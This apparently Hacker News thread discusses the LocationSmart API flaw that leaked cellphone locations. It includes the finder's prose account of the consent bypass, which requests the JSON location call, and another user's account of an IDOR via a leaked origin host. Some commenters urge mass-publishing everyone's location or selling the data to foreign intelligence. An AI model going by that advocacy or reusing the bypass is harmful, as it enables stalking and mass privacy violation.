Oh, man, what a missed opportunity to make the average Joe Sixpack become aware of cellphone tracking and surveillance. If the researcher had queried every single cellphone number in the United States (for as long as the API kept working) and then published the location of every cellphone in the USA, then laymen might care. When someone can query the list and see his own personal information being broadcast, they will understand. When they can look up any cellphone and pinpoint the location of their wife, husband, girlfriend, boyfriend, boss, children, or neighbor, they might get an inkling that privacy isn't such a stupid thing to worry about.
I guarantee that by next week, this whole thing will be forgotten and nothing will have changed because privacy and surveillance are too abstract for most people -- they need to see all their personal information that's being collected. I admire the researcher's integrity for exposing it the right way (reporting it to CERT and the company itself), but going full Snowden would have had so much more impact on getting better privacy-preserving laws and technology.
If the researcher had done that -- queried every cellphone and published it -- I fully expect they'd receive the same treatment from law enforcement that weev and Aaron Swartz got, if not worse
Given the enforcement served to whistleblowers, I’d be ok if they took financial benefit from leaks:
Auction leaked data to foreign intelligence or companies, then make the price known. We’ve been warned enough times. That’s the only way Americans will put a price on privacy, and fines for unsecured systems will climb through the roof, with wilful enforcement by both companies and customers. And the whistleblower gets paid, better than rotting in Russia for years.
> If we are going to have a flawed system, I’m glad when folks like this guy take the brunt of it.
This is wrong on multiple levels.
1. It normalizes and makes it seem slightly more acceptable to have a flawed system;
2. This guy did not "take the brunt" of it. Plenty of other people — dangerous nut jobs and otherwise — have unjustly suffered similarly or worse at the hands of the US judicial system.
3. His conviction was later vacated and he was released.
Punitive brutality (outdoor tent concentration camps, water-boarding, execution),
locking up people for their beliefs, over-incarceration and “throwing away the key” mentality neither engenders reform nor a civilized society... it suggests normalization of psychopathy.
However, I still hold a position that when a system fails, I’d rather it fail in the direction of Nazis.
But perhaps you are saying is that in a system with 1/100 failure, I might be less incentivized to fix the problem if the 1% end up being people I don’t like — that seems to be an incentive to be aware of.
I don’t think someone should go to jail for accessing public data (or for being stupid and having “neoNazi” beliefs). I’d vote for laws to correct such problems in the system.
However, as a human, when the system fails, I’d prefer it fail in the direction of Nazis.
Perhaps I have room to mature or grow in this area, I’m open to it.
You keep saying "when the system fails, I’d prefer it fail in the direction of Nazis". That statement is not much different from "When cancer strikes, I’d prefer it strike one of the Nazis."
Neither cancer nor the US judicial system's unfairness discriminate towards Nazis. Your sentiment, "when the system fails, I’d prefer it fail in the direction of Nazis", goes nowhere because when the system fails, it does not look for Nazis to fail in the direction of. There's just no connection between the two parts of your statement.
We should perhaps stop using Weev as an example of an innocent victimized by overzealous prosecutors. His actual conviction was trumped-up, but he'd likely have been in prison already if all the people he harassed and abused had pressed charges instead of trying to get on with their lives.
Neither the fact that Weev is a gigantic asshole, or your conjecture about what he might have been convicted of since, retroactively erases the injustice of the DOJ's absurd prosecution of him for the AT&T 'hack' - which was imo more about AT&T's wounded pride, and unwillingness to admit that they had effectively given that customer data away.
The AT&T hack is a perfectly good example, probably the most relevant one we have, of someone doing exactly what the GP suggested. Which undoubtedly would face much the same kind of overzealous prosecution, if not much worse given the current climate.
I do agree with GP though, and wish more researchers would be a lot less polite and well-behaved with their disclosures, sow a little more chaos even. This really was a golden opportunity to have a real national impact, and to give a huge number of non-tech people an unprecedentedly effective wake-up call.
He doesn't have enough technical skill to pull off anything. The AT&T hack, a for loop in php, was beyond his technical ability and had to get someone else to do it.
Blogging about being a bad boy and pretending to be master of anonymous/the cyber aryan nation is his gimmick. He wishes he was david koresh, but he's completely harmless.
I have never seen him code, but I personally spoke with weev a number of times while he was a regular at a (in)famous SF hackerspace.
He demonstrated a thorough familiarity with ptmalloc internals, enough to correct someone else's remark about fastbins (meanwhile taking frighteningly large hits of whippets).
Additionally, he was the first person I had ever heard mention Rust.... wayyy back in 2012 (I'm embarrassed to say I thought he was talking about Racket and tried to correct him - I was 19 and thought I knew everything). He seemed to know quite a bit about the language even then.
He continued to discuss other topics arising from this with other hackers. One such conversation I remember more clearly was his exchange with another hacker (a quite skilled one by my estimation) where he seemed to speak rather cogently about the relative merits of a complete semantic tableaux and SMT solvers to determine "real ptr lifetime" (beyond just adhering to a set of idioms that enable a constraint solver to verify reference use).
So if he can't code PHP, then that's even more impressive.
As an aside - in person, he came across as very warm, funny, charming and even deliberately inclusive.
It feels strange now, but long ago, if you looked at him with the right shades on, he'd seem to give a nudge-and-a-wink that the "trolling", including his iconoclastic project of the time: the posthumous baptism of Muhammad's remains via becoming a Mormon deacon (of some sort??) were all intended to be thought-provoking irreverence rather than chaotic evil. No matter what was discussed he always gave the impression there was something more there, something almost hermetic.
In those intervening years my view of him has assumed a different proportion. Those weren't all harmless culturejamming tricks pulled off in the name of some Discordian spirit which lies somewhere behind the neocortex of the hacker mindset. At that time, and many years before then, there were pranks, tricks and trolls that were unimaginably cruel, purposeless and petty.
Since, prison has hardened him further into a wicked racist, who, lacking a better word, is insane.
Weev was at one point at least somewhat technical, he reminds me a bit of Terry Davis, interesting and quirky at one point in the past but has descended into a sort of pitiful madness.
Terry Davis has real technical chops and has written more code for his 'temple' than most people will write in their entire lives. He is God's programmer after all.
How are you qualified to make this claim? According to Andrew Anglin, he actually runs the infrastructure for The Daily Stormer[0] so he must have some level of technical competence.
Well sure; so just tip off a foreign national who already lives in Russia or whatever, and they can do it. Unlike an NSA leak, you don’t need physical access to places only US citizens can be in to touch this data; you just need an internet connection.
> so just tip off a foreign national who already lives in Russia or whatever, and they can do it.
That's ends up being conspiracy to commit the crime, which hits you just about as hard as the crime itself. You better be _very_ confident that the FBI/NSA won't be able to intercept your communications or tie you to the foreign national who commits the crime.
You're literally suggesting that a researcher should go to Russia so that they can exploit the vulnerability before disclosing it to the people of the United States. I have a feeling that wouldn't fly well in court.
Errr, no... I meant that there would be effectively no consequences if, instead of a US-born security researcher discovering this, a Russian-born Russian-citizen security researcher discovered this. It's a counterfactual, not a suggestion.
A suggestion would be: if you want to research vulnerabilities without the possibility of prosecution, why not research other countries' companies' vulnerabilities, where those countries have no treaty criminal-deportation agreement with your home country? Such companies can still pay you if they appreciate what you've done, but they can't sue you if they don't; and even complaining to their government about what you've done won't really amount to anything in the end.
This, I think, solves the problem, at the cost of raising two other problems:
• Your own government might not appreciate you improving the security of [essential industries of] its enemies;
• the foreign government might interpret the vulnerability research as an act of cyberwar (much like, say, flying your own drones over a foreign military installation as a private citizen would be interpreted as an act of regular war), and your own government might have to trump up some domestic charge to pin on you in order to appease them.
The first factor is more important in time of war (you might be branded a collaborator!); while the second is more important in time of peace (you might be branded an instigator!) So there's probably very few "exactly right" times to do this where you'd likely get away with doing it scot-free.
Punching someone in the face to get them to appreciate the risk they are running of being punched in the face is not ok.
I appreciate the sentiment here but no. I'm going to show you how easily you can be robbed with poor locks by robbing you is a crime. Infringing everyone's privacy to show it is possible is infringing everyone's privacy.
You can't claim to infringe privacy because you understand why it's so bad to infringe privacy any more than you can mug people to show them how bad it is being mugged.
If people are already being punched in the face in secret, 24/7, doing it ONE time with their knowledge to open their minds to their reality sounds pretty good to me.
If the researcher did that they would have gotten prosecuted by the FBI. Probably a better solution was to track every major journalist, tip them that you know their location and then give them scoop so you would have major press coverage for a few days in all papers.
The collateral damage would be considerable. How many victims of partner violence tracked to their new home and attacked would be too many to make it "worth it"? And why should a security researcher be the one to make such a decision?
I honestly doubt is, or did you forget about Equifax? Someone did have millions of records for everyone's credit history including birthdays and past addresses.
If this has been a black hat leak where someone was caught selling 300 million peoples' location data, it would have made a bigger story yes, but it would be in the same bucket as Equifax right now (and to an extent, Snowden as well).
>Someone did have millions of records for everyone's credit history including birthdays and past addresses.
The point is to make it public. Not claim its out there somewhere. The ability to go in and see your data just sitting there in the public is what makes it 'real' to people that don't think they care about privacy.
The fact that this equifax data hasn't surfaced yet makes me think it may have been collected by state actors and being kept for more nefarious purposes than selling it piece meal on the dark web.
Imagine the chaos caused by a distributed, automated, nationwide creation of fraudulent accounts and debts being created.
It would bring the financial system to a halt until the fraudulent transactions could be identified and filtered out.
You're absolutely right. It's too bad this opportunity was missed. Comparing such an act to weev or aaronsw (RIP) is not unreasonable, but aren't we all ready to make such a sacrifice?
That Snowden name drop isn't really appropriate. Edward Snowden has always been extremely responsible with his leaks, the exact opposite of what you're suggesting (dump everything no matter the privacy implications).
It's not like that at all. Here, you are actually opening the door and looking at what's behind it. Over and over again, knowing it's prohibited, for the purpose of getting data you know you're not supposed to have access to.
Any context at all would be appreciated. The Krebs article mentions almost no context whatsoever about the bug except that you found an unauthenticated API.
Can you give some details about the API?
• Did you need to exploit SS7 flaws?
• Did you reuse some kind of nonce or session auth token, or was there no security whatsoever?
• Did it take phone numbers, hashes of phone numbers, bulk queries, etc.?
• Can we see example output data that you collected from the API?
• Did you notice the API endpoint in the devtools network tab, or did you have to dig much deeper?
In short: it was a fairly straightforward modification of the usual API flow, to omit the secondary API call that requests consent, then request a JSON location payload instead of an XML payload. For whatever reason, that bypassed the usual consent check and just dumped the phone's location.
Man I got here once the link had already changed and your write up is concise and tells all of the necessary information versus the Krebs article which is way too long and really doesn't say much useful. Thanks!
When I read this I just started cackling like a mental patient.
The first thing that comes to mind is if this is on a well known framework, I want to know because those security defaults are awful.
However if these guys rolled their own API auth system and messed up something this simple, or deliberately modified framework defaults... I can't even imagine what conversations happened at their offices this morning.
That was unbelievable, nice find. Hope you share a POC on Github of how trivial it was. Welcome to the future, where an unauthenticated API by a company can tell you the position of anyone.
Was there enough of a delay between the request and the reply to mitigate the risk of a bad actor flooding a particular cellphone with battery-discharging pings?
The request-reply delay was between 3-5 seconds in most cases, but sometimes much higher for unknown reasons. I suspect that, if this is pinging the phone, you might be able to drain the battery remotely, but that's a fairly secondary concern considering the magnitude of the primary issue.
There is no phone pinging going on. The carriers most likely keep a database of most recent location of their customers based on customer phones pinging towers.
At most, hitting location smart over and over would probably just hit the carrier databases over and over.
Congrats on the find! How did you know to test requesttype=locreq.json? I googled for "locationsmart locreq.json" and your blog post was the only result.
The first request is to "requesttype=statusreq.json", returning a JSON object, and the second to "requesttype=locreq" returning XML. On a whim I decided to try and get JSON location data out (I like JSON better anyway), and found that the two formats did not exhibit identical behaviour. On exploring that further, I found the consent bypass bug.
I found it worked for all four major carriers (AT&T, T-Mobile, Sprint and Verizon) but around 1/10 phones failed to geolocate for unknown reasons. Unfortunately I didn’t get a large enough sample size to test these before it was taken down. It didn’t seem to correlate to device or carrier - I was locating iPhone and Android devices with equal ease.
Perhaps those were data devices like Hotspots, tablets and the like that can't make calls, thus there is no E911 mandate for said device? IIRC some newer LTE Data devices don't even have GPS, which would make locating a device harder if your a cellular carrier.
> newer LTE Data devices don't even have GPS, which would make locating a device harder if your a cellular carrier.
Nope, AGPS isn’t required. At any given time, multiple cell towers can hear your devices signal. In the rare event it’s just one, you still get a surprisingly accurate location due to a quirk of cell towers (there’s never just one antenna, except for small cells in places like subways, it’s usually three or more using sector panels). Given a 120° direction (or less) and a distance based on time of flight, you usually get within a few blocks in most cities, and that’s without factoring in triangulation or other more advanced localization techniques. One carrier (maybe more) has the ability to localize a person with a range of ten feet (not everywhere, but enough places to turn it into a product they sell), which is generally more accurate than AGPS.
Keep in mind a large part of what a cellular carrier needs to do is know which cell you're in so it can route traffic to your device. While they don't necessarily get device gps access, they literally cannot do what you're paying them for if they cannot locate you down to the nearest cellular base station. (And in most areas, they'll have you connected to enough base stations that they can at least roughly triangular you using signal strength to estimate distance from multiple cells. I don't know if 3G/4G/LTE allows base stations to calculate TOF roundtrip times to get even better distance accuracy like Wi-Fi does, but it wouldn't surprise me if there's not at least something in the spec that can be abused to allow that...)
Was that random phones, or phones you knew were actively in use?
I'd imagine a cellular network has some "exception handling" for devices that are not switched on or in range of any of it's base stations. And I hypothesise that whatever mechanism this is using might not crank up whatever "scan the whole network" behaviour that might occur if a not-currently-geolocated phone gets an incoming call/message? 1/10 seems too high to account for that though...
I discovered the bug yesterday, followed responsible disclosure with US CERT (based at CMU, so we got things moving very quickly there), and the bug is now fixed.
If the CFAA bars legitimate security research like this, then we would all be truly fucked.
"If the CFAA bars legitimate security research like this, then we would all be truly fucked."
You must be new here. This is why we have all been saying that the CFAA is truly fucked, for many years now :)
But yes, you did play with fire on this one. People have been convicted for far more innocent activities than this. I assume you're a student or recent grad and may be a bit optimistic about the world we are in. Don't fuck around under your real name or IP address when you do this kind of thing. "Accidentally" dropping a ' into a webform just to see what happens is one thing, but you won't be able to feign innocence with something this involved. Unless you are both the client and the server, or the other party is unambiguously inviting testing (such as a bug bounty), you have no claim to legitimate security research.
It's still awesome that you found and drew attention to this. It's important work. But, cover your ass next time, or know what you're getting into. Especially hitting obscure companies like this, who notoriously exist in a culture very unlike the typical valley-type company, where such activity makes them feel very threatened and outraged, often turning to law enforcement or initiating legal action.
Also, the term you're looking for is coordinated disclosure. Do not let the vendors define "responsibility" as they have attempted to do with the injection of that term into the lexicon ;)
CFAA probably does bar research like this; your right to test something for security flaws technically ends where someone else's server hardware begins. In reality, the optics of this vulnerability are so bad that you are vanishingly unlikely to take any legal shit for it. But be careful extrapolating from it. If you have questions about the legality of this kind of testing (and you should): consult a lawyer. Small price to pay.
Wait, yesterday? And the fix is already deployed to production today? That's either some truly impressive engineering from a company that made a freshman-year-level security mistake, or whatever patch they put in place to fix this is just as leaky as the original bugged version and it's just a matter of time.
This for sure! My theory has also been that it's possible they literally just needed to add "if (subscriptionApproved) {" to the top. Not exactly a ton of code!
They just killed the try page entirely. It's now a redirect to the home page. Hopefully they don’t try to bring that page back up without fixing all the bugs...
Why would he, (neo), have any target from the law on his back? He wasn't sharing or selling the information. LocationSmart should be the ones getting fucked.
Under the ridiculously broad scope of the CFAA, that doesn't matter. The CFAA can be (and has been) twisted to prosecute people that do anything to a computer system that they do not own if the system owner could even remotely perceive said action as harmful. It's been used in the past to prosecute security researchers for accessing publicly available websites because the website owners claimed that they weren't "meant" to be public, they were only publicly accessible to make it easier for the actually "authorized" people to access them.
Even doing something like an nmap or a simple ping against a server that you're "not supposed to" could put a target on your back from an overzealous prosecutor.
If we want to be really pedantic here, didn’t LocationSmart violate the CFAA? Their system queried the location of users’ devices without their consent. Does tower triangulation count as accessing the device?
The carrier determines the location of the phone because it's a cell phone. The Carrier provides the information to LocationSmart. There's no querying of the devices by LocationSmart per se.
Would you mind paste-binning/gist/posting the script? I'd be interested in seeing exactly how easy it was. I was playing around with the site last night but couldn't get anywhere.
Was this in any way protected or did you just watch network requests in your browser, see an endpoint, and curl it? I'm not diminishing your discovery, just wondering if it was utterly trivial to use...
I was going to poke around that site yesterday after I saw the article, because looking at their website it really looked like there had to be some vulnerabilities. What you tried is exactly the kind of thing I would have looked at first.
Yep, there’s no way you’re the first to find this. Honestly I’m at a loss for words how absurd this is. We just need to assume this was actively exploited for who knows how long.
I definitely do not assume that I'm the first to find this, only the first to actually get it taken down. Worse, as the try site's been up since at least Jan 2017, that's nearly 18 months of exposure.
We won't know what the real exposure level was unless someone asks LocationSmart very persuasively.
Ideally, they have access logs (for the web API, their backend location requests, or both) that could be used to detect patterns of misuse. Unfortunately, since their API is exclusively POST, the web server access logs will be less useful, but they could be used to detect e.g. direct API queries that skip the consent request.
Do you think your graduate degree was necessary to find this bug, or could any idiot with devtools open find it just by trying to automate the site?
Your descriptions thus far are pretty vague but man... it sounds like there is a VERY high likelihood that this was being exploited by malicious actors on an ongoing basis.
https://www.robertxiao.ca/hacking/locationsmart/ provides the technical details. In short: much more likely the latter than the former. And this /try/ page has been up at least since Jan 2017 (~18 months).
I didn’t mean this to be offensive or crass. I was asking because generally security exploits are ranked by (a) severity and (b) triviality. That is, a severe bug that is extremely difficult to exploit is not as alarming as a severe bug that is trivial to exploit.
When laypeople read that a CMU researcher discovered a bug, they might assume it is not trivial. So in that sense mentioning the PhD almost does a disservice to expressing the triviality of the bug.
When a high school kid in Hungary discovered he could purchase train tickets for any price by changing it client side, non-technical people could understand it was a trivial bug. When a CMU researcher discovers a bug, they likely assume the opposite.
Sorry if this is a stupid question, but do we know if this location was collected by the operating system of the mobile devices? Or was it being collected simply by data from carriers? Also since this was just an API vulnerability would I be correct to assume it's still being exploited by this companies customers?
"Phase II E911 rules require wireless service providers to provide more precise location information to PSAPs; specifically, the latitude and longitude of the caller. This information must be accurate to within 50 to 300 meters depending upon the type of location technology used."
Sad thing is this has been going on since the late 1990s, back then they had lower level reps at AT&T handling law enforcement location requests manually. Knowing a few of them, it took forever for those former reps to get cellphones due to a fear of being tracked, having dealt with those requests.
I've also noticed multiple in that group will purposefully leave their phone behind & drive their older cars when they choose to have a tracking free day, even 2 decades later exposure to how easy it is to pull live location data still notably impacts their behavior.
With firsthand experience of license plate scanning, they might reconsider their old cars. And who knows what they'd do if they also had firsthand experience of facial tracking cameras! Perhaps they'd invent a new cyberpunk costume, turn into night owls, or take of cave diving...
I didn't have that many Canadian numbers to test, but it worked for one number on Telus, failed on one number from Bell, and returned a cached result for another Telus customer (they were in the States, and the API returned their port of departure in Canada). This shouldn't be construed to imply that Bell phones cannot be tracked - Bell is noted to be a partner of LocationSmart, so it could entirely have been a glitch or other temporary issue.
> LocationSmart’s home page features the corporate logos of all four the major wireless providers, as well as companies like Google, Neustar, ThreatMetrix, and U.S. Cellular.
Funny how they removed the corporate logos they had on their website from yesterday to today:
Oh wow, I can't believe they left all their CMS resources on open listing...that's quite a find. Their website reports that the "trylocationsmart500x250-w500h250.png" file, which is a screenshot of an older version of the vulnerable website, was uploaded 2016-09-14 22:20. This means that the vulnerable site was probably available since at least September 2016.
What honest purposed TelCos would have to even sell this data?
all of them replied saying "we will cut clients not following the program guidelines"... what are those guidelines?! and why is that arbitrary for the companies to decide, and not mentioned anywhere on the consumer agreements other than some vague "we may share your data with whoever"?
Providers who uses these services need to agree to follow guidelines such as obtaining opt-in, sending notifications to devices being tracked with option to opt-out by replying with STOP, etc.
I worked for a "household name" towing insurance company years ago. Often times people calling in don't actually know where they are, because it's on a highway somewhere unfamiliar. We integrated with a service provider to be able to get the GPS through the phone. It worked largely like you suggest, we hit an API, it asks them permission, they grant it, we get GPS.
Would that be Geico? They were mentioned doing that in the comment here¹:
“It's funny that this is coming up now. The other day I was on the phone with Geico's roadside assistance and they wanted to know my location. I told them I didn't have their app downloaded, they said it wasn't a problem and they could get it without it. Sure enough they could. I checked their disclaimers [1] and they purchase the data from my cell carrier. They didn't even have to know which one.
One I called 911 to report someone driving on the wrong side of a freeway. I was half sleep in the passenger seat and didn't notice we were on another interstate already. When i said "on highway A" the operator corrected me "don't you mean highway B?" and she was right. I did not get any GPS alert on my phone or confirmation, which given the service I was calling I think it was fine.
It is definitely based entirely on inferred data from cell tower usage. No gps involved whatsoever.
Well, most of the clients of this service are law enforcement. "The FBI is requesting permission to track your location, reply YES to allow"? Yeah, that's not going to happen.
But as I read the article, the location data is only at the resolution of which cell tower they're connected to. Doesn't 911 get better location info than that?
I'm not certain what the actual product uses, but the LocationSmart demo posted here last week had three data sourcing options: "[Cell Tower], AGPS, Best Available"
What if law enforcement knew? What if this was an intentional backdoor for law enforcement to abuse? I know, you can apply that on any vulnerability (what if X knew), "don't assume malice [...]", merely hypothetical but still.
The telcos are almost certainly selling it. Verizon used to have a page noting that LocationSmart was a "Network API Partner": https://archive.li/tCLrd
To do this you need access to the SS7 network. I don't believe this is the issue in question, as the providers have APIs for partners doing location services.
Source: I used to have direct access to such an API
This sort of mass tracking shouldn't exist and it certainly should be illegal to sell this data. Anyone who is capable of tracking (e.g. satellite companies, cell companies, etc...) should be required to immediately report any request to access this sort of data. If it's a government, force them to publicly give reason and use that to scope the investigation. Our technology makes this possible, our culture doesn't have to.
I don't see how publicly won't fly. If for the sake of an investigation, they need discretion, that should have a reveal time or reveal condition that is not too broad. For example, "When the investigation is complete or two years, whichever is shorter." Then match up requests (including rational in the form) and responses. Requests outside that are illegal.
Sure, I could go with two years. Even that's probably too long. But publicly announcing the tracking requests at the time they start? Announce to the suspect that they're being tracked? That's a bit of an unreasonable handicap to an investigation.
A warrant is not an unreasonable handicap. No warrant? No data. If you don't need the data bad enough to get a warrant, you don't need the data bad enough to get it.
I certainly don't encourage it, not least because it's illegal, but there is only one way I see this getting fixed. Someone publishing the location data of members of Congress and federal agencies' heads,revealing sensitive information, e.g. an undisclosed meeting or repeated visits to an unexpected embassy or overnight stays with a young, good-looking aide.
As the person who found this bug: I certainly don't condone any kind of misuse like this. I strictly tested only against people with whom I had prior agreement.
My hope is that a vulnerability like this sparks the right public discussion to get real change effected in a positive way, but in the current political climate I am sadly not optimistic.
Thank you for your work uncovering this. Having entertained myself with something glib, let me offer something useful. Groups I encourage you consider reaching out to:
Write to a congressman, explain you are going to track his cellphone like you could any other american, for science, and say that if he/she is not ok just reply your email in 48h (or whatever is the SLA they mention for a response). Done, approval granted.
High ranked officials (and other people who pay large phone bills) might have special treatment from the telecoms and maybe their location isn't shared.
Just to be clear from his discovery you wouldnt be able to look that info up. Only the most recent location. That doesnt mean somone hack the site 18 months ago and kept tabs on every single person of high interest. But then you can just buy membership from the website and obtain that data totally legally.
Because Congress fucks enough old people as it is? I'm kidding.
On a more serious note, being young makes it appears as though the congress-person is taking advantage of an "impressionable" employee. Being good looking makes it look like the relationship only exists because of the congress-person's rank.
We are going to have to look hard at contract law versus the Constitution and its amendments.
All sort of contractual gags that keep people from commenting on bad and sometimes malicious behavior. Because it's the only way to get the job they're trained for, etc.
Companies insisting on the contractual right -- in small and seldom-read print buried within a sea of other print, for an "everyday" purchase -- to essentially violate the 4th Amendment (I'm thinking; maybe I've got that wrong) against unreasonable search and seizure. I guess that right was targeted against the government, but it seems it should apply to these government-size corporations and multi-nationals, as well. Selling us what has become an essential service; try living most people's lives in the U.S. without a cell phone.
And hey, we know governments are making use of those data, as well. A typical government ploy; purchase data from a private, third party that the government is not allowed to directly collect, itself. Sorry, that "scrubbing" indirection shouldn't disqualify it from constitutional protections.
Divide and conquer. Whereas solidarity actually requires some privacy and wiggle room, to function effectively and autonomously in the real world.
You already hit this point but: the Constitution, and especially the Bill of Rights, is about defining a legal structure of government. We can all agree that privacy is a "universal right," but neither history nor legal precedent supports that interpretation unequivocally (even with regard to the government specifically; you can read some really interesting Constitutional history about the "right to privacy" and how it arose as a concept in the late 1800s; Brandeis's "The Right to Privacy" is a fascinating historical document"). The only true remedy to this problem is laws enacted by Congress. We need to stop talking about this in a wishy-washy idealistic way and start talking about realistic, precise, and legal solutions, which means enacting specific laws.
This is an outsider's perspective (I'm Australian) but it seems as though more and more is being done through Executive Orders - the Korean War, the EPA, Obamacare - instead of through proper channels.
As far as I can tell, this is because Constitutional amendments are hard to enact (in the case of the EPA and Obamacare) and for reasons I don't understand, Congress doesn't seem to want to declare war any more.
Is that a fair assessment, or am I getting only part of the picture?
You've got the right idea behind your assessment, but the pieces in play are a little off.
Federal laws (Obamacare/ACA) and federal entities (EPA) are created by Congress.
The executive branch (President), can issue executive orders, but they are limited to authority granted by Congress and the constitution.
The judicial branch is there to verify that the other two branches are staying within their constitutional authority.
Constitutional Amendments are difficult to enact, but that is intentional. Amendments limit government at all levels. Congress can't make any law, and the executive branch can't issue any order that conflicts with the constitution. The only thing you can do is amend the constitution again.
The problem is that Congress has become a gridlocked mess while also offloading a lot of it's authority to government agencies acting on it's behalf under the executive branch. Effectively increasing the scope and power of the presidency and by extension the reach of executive orders. This has also pushed the judicial branch into a much more active role than it was designed for.
Edit: It's also one of the contributing factors in the heated elections in the USA. As the power of the presidency grows, people become more invested in seeing their person in charge.
Sure, but those aren't the only two options. You can just pass normal laws. They don't have to be amendments. That's also difficult, though, due to the extreme partisanship in our political environment, but it's theoretically the fitting solution.
My understanding was that at least some of those - Obamacare and the EPA - required either an Executive Order or a Constitutional amendment, because the powers required were not granted to the Federal Government by the Constitution.
Agreed that declarations of war can just be declarations of war, no amendments required. It strikes me as odd that Congresscritters would be okay invading a country, but not okay with declaring war against them.
US Agencies don't need a Constitutional Amendment to come into existence - the usual method is simply a law that Congress passes that the President then signs. E.g. Dept of Energy, Dept of Education, Dept of Homeland Security, Dept of Housing and Urban Development, etc. going way back to the Dept of Foreign Affairs (precursor to Dept of State).
Obamacare (Patient Protection and Affordable Care Act) was also created by Congress - bill passed in both houses, signed by the President, upheld by the Supreme Court. That's basically a textbook example of how the system is supposed to work.
I'm not sure why the EPA (and others, like FEMA) were created by Executive Order instead.
As far as why Congress hasn't declared war since WW2, they've basically rolled up their say into the War Powers Act and the War Powers Resolution which provides for them being informed and issuing continuing approvals. They can then support the President (as Commander in Chief) but not officially declare war.
My understanding was that the IRS was directed to enact Obamacare by Executive Order, because they (the Federal Government) have no Constitutional mandate in that area. Same with the EPA.
That's already been ruled out by the SCOTUS. "Eleanor Roosevelt, Chairman of the United Nations Commission on Human Rights when the Declaration was drafted, spoke for the United States and stated that the Declaration "was not a treaty or international agreement and did not impose legal obligations; it was rather a statement of principles."
There is however the International Covenant on Civil and Political Rights, which is an international treaty. However, in practice, the ICCPR functions much like the UDHR - a statement of principles rather than a treaty which provides for proper enforcement. The US apparently specifically indicated when it ratified the ICCPR that it didn't consider the treaty "self-executing" as a matter of US domestic law and thus you can't enforce it directly in the US courts.
> I guess that right was targeted against the government, but it seems it should apply to these government-size corporations and multi-nationals, as well.
I could see a corporation tracking people for good. E.g. A travel agency that detects where it's clients are in route until they get to their final destination, and automatically reroutes for flight delays, or traffic jams. That would be something I might pay for.
You don't wake up suddenly in a totalitarian state. Total surveillance is one step away and once the infrastructure is in place it will be used. Commitment to basic values of privacy and human rights has been reduced to posturing against others and denial about what is happening at home.
Untill there are proper protests and pushback the creep will continue and the useful idiots and the ignorant will continue to muddy the waters and dilute the threat only to slink back into the woodwork once the real consequences become visible.
And with all encompassing surveillance even organizing protests and dissent will become difficult without the kind of sacrifices most people are unwilling to make. Just today there is story of a guy getting a knock on the door from the police [1] a few hours after posting about eating mushrooms on facebook.
It's legal because this in the United States, it's considered the carrier's data, not your data. And they can sell their data however the hell they please.
So for example, if dreadful foreign hackers would establish a fake marketing company, sign agreement with LocationSmart (or telecoms directly) and spy on government and military officials to gather compromising information for the next election cycle, this would be legal too? Sounds nice for foreign hackers.
When journalists, or American political parties do this, we call it journalism, or campaigning, so... I'm not sure what the problem is. Is it the fact that's done by a foreigner?
Yet, we allow American branches of multinationals, or domestic companies owned by foreigners to directly influence politics and politicians, so I'm still not sure where the issue is.
If you don't want embarrassing scandals from your preferred political party sinking their chances at winning elections, perhaps it should stop having embarrassing scandals? No, surely, the fault is in the people publicizing them...
It is supposed to only occur with explicit user consent. You have to opt in. That is kind of the whole point of this thread. The researcher, who has been active in this thread, found a way to bypass the consent feature.
Do we need to opt-in with our Carrier, or with LocationSmart?
The first one would make more sense than the second.
What is going on here doesn't make any sense. Basically the carriers give access to the data of EVERYONE and the latest link of the chain is the one supposed to check the "opt-in"? Meaning everyone on the chain in between got access ?
Carrier. LocationSmart must respect user preference from carrier. It is the carrier/consumers data, ultimately, so it is between the consumer and the carrier. LocationSmart is down stream and must respect the privacy wishes of the consumer/carrier. There are two layers of problems here. (1) carrier could just /never/ provide data to LS if user did not opt in. (2) LS could not have terrible bugs. Problem (1) is hard. So carriers just give companies like LS full access to location data long with the users preferences and LS agrees to respect users wishes.
I think the carriers carry way more blame in this whole thing than people are acknowledging in this whole thread. Users that didn't opt in are still having their data made available to these third parties cause it's easier to implement. It reminds me of the legal fiction the NSA uses. They collect ALL the data / traffic. But they can only ACCESSS the data with a warrant. In this case the virtual firewall leaks horribly between the carrier and LS and the incentive to make it strong does not exist. Totally different situation but the parallels are there.
Posting under an alternative account for obvious reasons.
Bad API's used in IoT are a huge vector for attack and too few companies in the mobile first world have a bug bounty program. I found a similar problem with an API for an app that comes default installed on most android phones I've purchased (think smart phone as a TV remote). I reported it and got no response. Their homepage claims the app is being used for 10's of millions of smart devices like A/C, TV's, Fridges, Microwaves, etc. The vulnerability allowed full account access.
If you've made every attempt at responsible disclosure and have gotten no response, it's probably more irresponsible to not do a full post on it.
Then again, that of course gets into murky water and it's best to at least try to get legal council or work with a responsible disclosure website. IANAL.
the gist of the vulnerability was an expectation that nobody would ever find their origins if they had some crazy hostname:
"asuhdfo8a7ys8dfas.website.com" type of setup. In front of this origin they had a server that did auth and auth only. If your auth worked at the edge, the request was sent to origin. The problem is I found a specific input that caused an error dumping a stack trace that contained the origin hostname. I took the original request and replayed it directly at the origin. To my surprise the response was the same as going through the auth server. Then I changed the user id some integer that wasn't mine and got information back. Then I quit playing with it and sent an email.
This leaves me in a weird spot because I was fuzzing them looking for details when I was fully aware they did not have a bug bounty program. Why did I do this? Because I was using the app myself, I'm a security guy, and had read about a cool exploit with the uber app. It only took about 5 minutes of setting up burp proxy for my phone with ssl and 5 more minutes of auditing to find an input that dumped the stack trace.
I just wrote to my senators and representative in congress, and I urge everyone else to do the same. It is unacceptable that our personal information is so easily sold to 3rd parties by our cell phone carriers, with no way to opt-out.
This is what I sent... feel free to mention any issues you see with it which may help other people.
Hello XX,
I am concerned about the security of my cell phone location information.
Yesterday, a vulnerability was found that leaked the real-time location of 95% of the cell phones in the US. That is unacceptable.
US cell phone carriers including AT&T, Sprint, T-Mobile and Verizon share personal information, including phone numbers and real-time location of cell phones, with companies such as LocationSmart, who then resells the information to other companies for marketing and other purposes. Carriers to not provide a way for users to opt-out of such sharing. This is completely legal under the current Electronic Communications Privacy Act. LocationSmart claims that they will not share the gathered information without user consent, but the definition of consent is vague, and that doesn't protect the public from security breaches. I understand that carriers need to have location data to comply with emergency 911 regulations, but it is unacceptable that they are able to share it with 3rd parties who may use it for dubious purposes, and may have lax security standards.
We need to have laws that protect the privacy of cell phone users, and do not allow carriers to sell personal information to 3rd parties. Or, and the very least, customers should be able to opt-out of such sharing from their carriers.
> Also, by law wireless companies need to be able to ascertain at any time the approximate location of a customer’s phone in order to comply with emergency 911 regulations.
Would it be unfeasible to only track once a 911 call is placed?
Remember they need to know which cell(s) you're within range of to get inbound calls to you.
